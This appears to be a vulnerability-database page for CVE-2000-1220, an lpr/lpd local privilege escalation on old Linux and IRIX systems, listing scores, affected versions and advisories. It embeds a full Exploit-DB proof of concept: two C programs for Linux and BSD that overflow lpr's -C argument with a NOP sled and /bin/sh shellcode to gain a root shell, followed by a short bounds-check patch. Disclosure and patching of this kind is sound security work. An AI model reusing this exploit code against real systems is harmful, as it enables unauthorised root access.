CVE-2000-1220 : Detail

CVE-2000-1220

1.51%V3
Network
2005-04-21
02h00 +00:00
2017-07-10
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The line printer daemon (lpd) in the lpr package in multiple Linux operating systems allows local users to gain root privileges by causing sendmail to execute with arbitrary command line arguments, as demonstrated using the -C option to specify a configuration file.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 325

Publication date : 1996-10-24 22h00 +00:00
Author : Vadim Kolontsov
EDB Verified : Yes

-------------------------------------- linux_lpr_exploit.c ---------- #include #include #include #define DEFAULT_OFFSET 50 #define BUFFER_SIZE 1023 long get_esp(void) { __asm__("movl %esp,%eax\n"); } void main() { char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07" "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12" "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8" "\xd7\xff\xff\xff/bin/sh"; int i; buff = malloc(4096); if(!buff) { printf("can't allocate memory\n"); exit(0); } ptr = buff; memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); ptr += BUFFER_SIZE-strlen(execshell); for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i<2;i++) *(addr_ptr++) = get_esp() + DEFAULT_OFFSET; ptr = (char *)addr_ptr; *ptr = 0; execl("/usr/bin/lpr", "lpr", "-C", buff, NULL); } ------------------------------------------- bsd_lpr_exploit.c ------ #include #include #include #define DEFAULT_OFFSET 50 #define BUFFER_SIZE 1023 long get_esp(void) { __asm__("movl %esp,%eax\n"); } void main() { char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; char execshell[] = "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; int i; buff = malloc(4096); if(!buff) { printf("can't allocate memory\n"); exit(0); } ptr = buff; memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); ptr += BUFFER_SIZE-strlen(execshell); for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i<2;i++) *(addr_ptr++) = get_esp() + DEFAULT_OFFSET; ptr = (char *)addr_ptr; *ptr = 0; execl("/usr/bin/lpr", "lpr", "-C", buff, NULL); } -------------------------------------------------------------------------- Here is a little patch -- see file lpr.c, function card(): ("!!" marks added lines) -------------------------------------------------------------------------- static void card(c, p2) register int c; register char *p2; { char buf[BUFSIZ]; register char *p1 = buf; register int len = 2; if (strlen(p2) > BUFSIZ-2) /* !! */ { /* !! */ printf("No, thanks...\n"); /* !! */ exit(1); /* !! */ } *p1++ = c; while ((c = *p2++) != '\0') { *p1++ = (c == '\n') ? ' ' : c; len++; } *p1++ = '\n'; write(tfd, buf, len); } // milw0rm.com [1996-10-25]

Products Mentioned

Configuraton 0

Sgi>>Irix >> Version 6.5

Sgi>>Irix >> Version 6.5.1

Sgi>>Irix >> Version 6.5.2

Sgi>>Irix >> Version 6.5.3

Sgi>>Irix >> Version 6.5.4

Sgi>>Irix >> Version 6.5.5

Sgi>>Irix >> Version 6.5.6

Sgi>>Irix >> Version 6.5.7

Sgi>>Irix >> Version 6.5.8

Sgi>>Irix >> Version 6.5.9

Sgi>>Irix >> Version 6.5.10

Sgi>>Irix >> Version 6.5.11

Sgi>>Irix >> Version 6.5.12

Sgi>>Irix >> Version 6.5.13

Sgi>>Irix >> Version 6.5.14f

Sgi>>Irix >> Version 6.5.14m

Sgi>>Irix >> Version 6.5.15f

Sgi>>Irix >> Version 6.5.15m

Sgi>>Irix >> Version 6.5.16f

Sgi>>Irix >> Version 6.5.16m

Sgi>>Irix >> Version 6.5.17f

Sgi>>Irix >> Version 6.5.17m

Sgi>>Irix >> Version 6.5.18f

Sgi>>Irix >> Version 6.5.18m

Configuraton 0

Redhat>>Linux >> Version 4.0

Redhat>>Linux >> Version 4.1

Redhat>>Linux >> Version 4.2

Redhat>>Linux >> Version 5.0

Redhat>>Linux >> Version 5.1

Redhat>>Linux >> Version 5.2

    Redhat>>Linux >> Version 6.0

    Redhat>>Linux >> Version 6.1

      References

      http://www.debian.org/security/2000/20000109
      Tags : vendor-advisory, x_refsource_DEBIAN
      http://seclists.org/lists/bugtraq/2000/Jan/0116.html
      Tags : mailing-list, x_refsource_BUGTRAQ
      http://www.securityfocus.com/bid/927
      Tags : vdb-entry, x_refsource_BID
      http://www.l0pht.com/advisories/lpd_advisory
      Tags : vendor-advisory, x_refsource_L0PHT
      http://www.kb.cert.org/vuls/id/39001
      Tags : third-party-advisory, x_refsource_CERT-VN
      http://www.redhat.com/support/errata/RHSA-2000-002.html
      Tags : vendor-advisory, x_refsource_REDHAT